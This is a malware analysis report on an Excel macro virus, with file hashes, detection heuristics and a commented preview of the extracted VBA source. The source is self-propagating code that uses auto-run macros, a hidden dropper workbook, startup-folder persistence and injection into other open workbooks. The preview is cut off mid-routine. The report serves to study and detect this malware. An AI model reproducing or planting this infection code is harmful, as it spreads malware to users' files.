Xls.Trojan.Efus-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 5e727bbf824c0af3…

MALICIOUS

Office (OLE)

31.0 KB Created: 2002-09-27 05:38:09 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: fc3d10778a703282373b7a77a508597e SHA-1: ae7e07f76aac836dbd9fd4ac726c94bd6748a2d1 SHA-256: 5e727bbf824c0af3765c52e3b8e3baaf1967653b024ae4d57064ea18f3911c7b
Risk score: 160

Malware Insights

Xls.Trojan.Efus-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel workbook whose VBA project contains a code module named "SUFE" with Auto_Open and Auto_Close entry points; the sheet and ThisWorkbook modules carry no code. The extracted source is a self-propagating macro virus rather than a downloader: it writes its own module source to C:\Ms_IO.sys, creates C:\MS_DOS and saves a hidden workbook C:\MS_DOS\Command.DOS with that module imported, sets Application.AltStartupPath to C:\MS_DOS and Application.OnWindow to "Command.DOS!Action" so the routine is re-triggered from Excel's alternate startup folder and on every window activation (Office Application Startup persistence, ATT&CK T1137), and then iterates over every open, saved workbook to inject the module into any that does not already contain "SUFE" (the CodeImport routine is cut off in the preview, so the exact import step should be confirmed from the full dump). No network activity or secondary-payload download is visible in the extracted source; the Punish routine called at the end of Action lies outside the preview and its behaviour is unknown from this page. Several APIs it relies on (Application.FileSearch, VBProject access) are legacy or require "Trust access to the VBA project object model", so on a modern Excel most of the chain fails silently under On Error Resume Next. The ClamAV detection "Xls.Trojan.Efus-1" corroborates the classification as known malware.

Heuristics 4

  • ClamAV: Xls.Trojan.Efus-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Efus-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30231 bytes
SHA-256: 8fead946a8ba6aeef7c5b4ed20d3f979f6a65caae6e38daa46d342f78b85ce45
Preview script
First 1,000 lines of the extracted script
' Document module "ThisWorkbook" (VB_Base GUID appears to be the Excel Workbook
' base class). Only the attribute header is present — no event handlers — so the
' workbook-level events are not used; all code lives in module "SUFE" below.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet module "Sheet1" (VB_Base GUID appears to be the Excel Worksheet base
' class). Header only, no code.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet module "Sheet2". Header only, no code.
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet module "Sheet3". Header only, no code.
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Standard module "SUFE" — the only component that contains code; everything that
' follows is the macro-virus body. CodeExport/CodeImport look for a component with
' exactly this name, so the module name doubles as the infection marker.
Attribute VB_Name = "SUFE"

    ' Module-level state shared by the routines below.
    Dim Modu        ' loop variable when enumerating VBComponents (CodeExport, CodeImport)
    Dim Infected    ' set by CodeImport: True when the active workbook already has a "SUFE" module
    Dim Code        ' full source text of this module, filled by CodeExport
' Reconfigure Excel-wide application settings. The security-relevant line is
' AltStartupPath: NOTE(review): Excel opens every workbook found in the alternate
' startup folder at launch, so pointing it at C:\MS_DOS — where Settle_C saves
' Command.DOS — is most likely the persistence mechanism; confirm against Excel's
' documented startup behaviour. On Error Resume Next hides any failure (read-only
' property, missing font, etc.).
Sub Option_Set()
On Error Resume Next
    With Application
        .UserName = "SUFE"                 ' Application.UserName is what Excel records as author — presumably a marker
        .StandardFont = "宋体"             ' Chinese font name (SimSun); hints at the author's/target locale
        .StandardFontSize = "12"
        .DefaultFilePath = "C:\My Documents"
        .AltStartupPath = "C:\MS_DOS"      ' persistence hook — see note above
        .EnableSound = False               ' cosmetic: suppress feedback that could draw attention
        .RollZoom = False
    End With
End Sub
' Locate or install the dropper workbook C:\MS_DOS\Command.DOS and hook it into Excel.
' Application.FileSearch is the legacy Office file-search object; NOTE(review): it was
' removed in Office 2007, so on modern Excel the search fails silently under
' On Error Resume Next, If_Settled stays False and the "first run" branch executes
' on every invocation.
Sub Settle_C()
    Dim If_Settled As Boolean
    On Error Resume Next
    With Application.FileSearch
        .LookIn = "C:\MS_DOS"
        .FileName = "Command.dos"
        If .Execute > 0 Then
            If_Settled = True        ' Command.dos already dropped
        End If
    End With
    If If_Settled = True Then
        ' Already installed: (re)register the hooks and refresh the exported source.
        ' MacroOptions binds a keyboard shortcut (ShortcutKey "c" — presumably Ctrl+C)
        ' to the Action macro inside Command.DOS; OnWindow names a procedure Excel runs
        ' whenever a window is activated, so the infection routine re-fires during
        ' normal use without any user action.
        Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Action", Description:="", _
            ShortcutKey:="c"
        Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
        Call CodeExport
        Exit Sub
    Else
        ' First run: dump this module to C:\Ms_IO.sys, create C:\MS_DOS, add a fresh
        ' workbook, import the dumped module into its VBA project (presumably requires
        ' "Trust access to the VBA project object model"; otherwise the Import call
        ' silently no-ops), save it as Command.DOS in xlNormal format and hide its window.
        Call CodeExport
        On Error Resume Next
        MkDir ("c:\MS_DOS")
        Workbooks.Add
        Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
        ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
        ActiveWindow.Visible = False
    End If
    ' Same two hooks as the If branch above; only the Else path reaches here because
    ' the If branch exits early.
    Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Action", Description:="", _
        ShortcutKey:="c"
    Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
End Sub

' Legacy auto-execute entry point: Excel runs Auto_Open when the workbook is opened
' (subject to macro security). Hands off straight to the infection routine.
Sub Auto_open()
    On Error Resume Next
    Call Action
End Sub
' Legacy auto-execute entry point run when the workbook is closed. Re-runs the
' infection routine and then saves the active workbook, which persists any module
' that CodeImport injected into it.
Sub Auto_close()
    On Error Resume Next
    Call Action
    Application.ActiveWorkbook.Save
End Sub
' Core infection routine, reached from Auto_Open, Auto_Close, the OnWindow hook and
' the registered shortcut. Configures Excel, installs the dropper, then injects the
' module into every other open workbook that has been saved to disk.
Sub Action()
    Dim j
    On Error Resume Next
    Application.ScreenUpdating = False     ' hide the window churn from Workbooks.Add/Activate
    Call Option_Set
    Call Settle_C
    For j = 1 To Application.Workbooks.Count
        ' Skip the dropper itself, and skip workbooks whose FullName has no path
        ' separator (i.e. never saved — presumably FullName is then just the bare name).
        If (Application.Workbooks(j).FullName <> "C:\MS_DOS\Command.DOS" _
            And InStr(Application.Workbooks(j).FullName, "\") <> 0) Then
                Application.Workbooks(j).Activate
                Call CodeImport            ' operates on ActiveWorkbook
        End If
    Next j
    Application.ScreenUpdating = True
    ' Punish is not in the visible preview; the name suggests a destructive or
    ' nuisance payload but its behaviour must be read from the full dump, not assumed.
    Call Punish
End Sub
' Dump the source of this module ("SUFE") from the active VBA project to
' C:\Ms_IO.sys — a filename presumably chosen to blend in with the MS-DOS system
' file IO.SYS. The file is later imported by Settle_C (and, it appears, CodeImport).
' Reading CodeModule.Lines via Application.VBE presumably needs "Trust access to the
' VBA project object model"; if it is denied, Code stays Empty and the file written
' below is effectively blank (On Error Resume Next hides the failure).
Sub CodeExport()
    Dim i
    Dim hFile As Long
    On Error Resume Next
    i = 0
    ' Walk the components keeping a 1-based index so the module can be re-addressed by
    ' position once the one named "SUFE" is found.
    For Each Modu In Application.VBE.ActiveVBProject.VBComponents
        i = i + 1
        If (Modu.Name = "SUFE") Then
            Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.CountOfLines)
            ' Prepend the attribute line so the dump is a valid .bas module for Import.
            Code = "Attribute VB_Name = ""SUFE""" & Chr(13) & Code
        Exit For
        End If
    Next Modu
    ' Open For Output truncates any existing file; Print # appends a newline.
    hFile = FreeFile
    Open "c:\Ms_IO.sys" For Output Access Write As hFile
        Print #hFile, Code
    Close hFile
End Sub
Sub CodeImport()
    On Error Resume Next
    Infected = False
    For Each Modu In Application.ActiveWorkbook.VBProject.VBComponents
        If (Modu.Name = "SUFE") Then
            Infected = True
            Exit For
        End If
    Next Modu
    If Infected = False Then
        App
... (truncated)